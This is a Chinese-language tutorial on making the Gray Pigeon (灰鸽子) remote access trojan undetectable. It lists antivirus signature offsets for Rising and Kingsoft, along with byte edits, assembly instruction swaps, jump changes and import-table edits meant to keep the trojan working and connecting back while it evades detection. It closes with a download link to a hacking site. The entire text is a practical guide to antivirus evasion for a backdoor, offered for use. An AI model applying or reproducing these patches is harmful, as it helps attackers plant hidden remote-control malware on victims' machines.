打造全免杀远程控制软件
主讲:冰点
QQ:
972826免杀实例,灰鸽子1.23VIP版
第一步,过专杀。
SEVINFO
JFDSKJF
TMAIN_FORM
FDSFS_FSDA
过了专杀,过了金山
搜索 MYCCL使用方法
瑞星特征码:
特征码 物理地址/物理长度 如下:
[特征] 00004DA8_00000001 十六进制添0,是0则写1
[特征] 0003FE22_00000001 十六进制添0,是0则写1
[特征] 00078C23_00000001 十六进制添0,是0则写1
[特征] 0007B7BA_00000001 十六进制添0,是0则写1
[特征] 0007C43F_00000001 十六进制添0,是0则写1
[特征] 0007C590_00000001 十六进制添0,是0则写1
[特征] 00081430_00000001 十六进制添0,是0则写1
[特征] 000822AA_00000001 十六进制添0,是0则写1
[特征] 00083BFE_00000001 十六进制添0,是0则写1
[特征] 00083CE0_00000001 十六进制添0,是0则写1
[特征] 00083CE4_00000001 十六进制添0,是0则写1
[特征] 00087E84_00000001 十六进制添0,是0则写1
[特征] 00087D1E_00000001 0048891E (此处添0无法运行)
0048891B . 64:FF30 push dword ptr fs:[eax]
0048891E . 64:8920 mov dword ptr fs:[eax], esp
这两句上下互相更换
--------------------------------------------------------------------------
[特征] 0008AECC_00000001 0048BACC (此处添0无法运行)
把push 0该为
push eax
push eax
或者
push edx
push edx
可以正常运行,
但是该为
push ebx
push ebx
或者
push ecx
push ecx
不能正常运行
-------------------------------------------------------------
[特征] 0008B160_00000001 0048BD60 (添0后会弹出灰鸽子安装成功)
把je该为jme
--------------------------------------------------------------
[特征] 0007AE08_00000001 0047BA08 (此处添0无法上线)
跳转法修改
0047C2F5 0区域
mov eax, dword ptr [48E388]
0047BA08 A1 88E34800 mov eax, dword ptr [48E388]
0047BA0D 8338 00 cmp dword ptr [eax], 0
0047BA10 74 11 je short 0047BA23
0047BA12 A1 88E34800 mov eax, dword ptr [48E388]
0047BA17 8B00 mov eax, dword ptr [eax]
[特征] 0008AF9D_00000001 0048BB9D (此处添0无法有效运行)
je该为jle
------------------------------------------------------------------
内存特征码:
[特征] 00079708_00000002 添0,是0则写1
[特征] 0007A4F6_00000002 大小写
[特征] 0007AC12_00000002 大小写
[特征] 00084CCA_00000002 汉字替换
[特征] 00090928_00000002 大小写
[特征] 0009094A_00000002 00494D4A 输入表修改
InternetOpenUrlA
[特征] 0009091A_00000002 00494D1A 输入表修改
ShellExecuteA
0007D6DB
教程地址:http://www.hack4.com/soft/softdown.asp?softid=3308
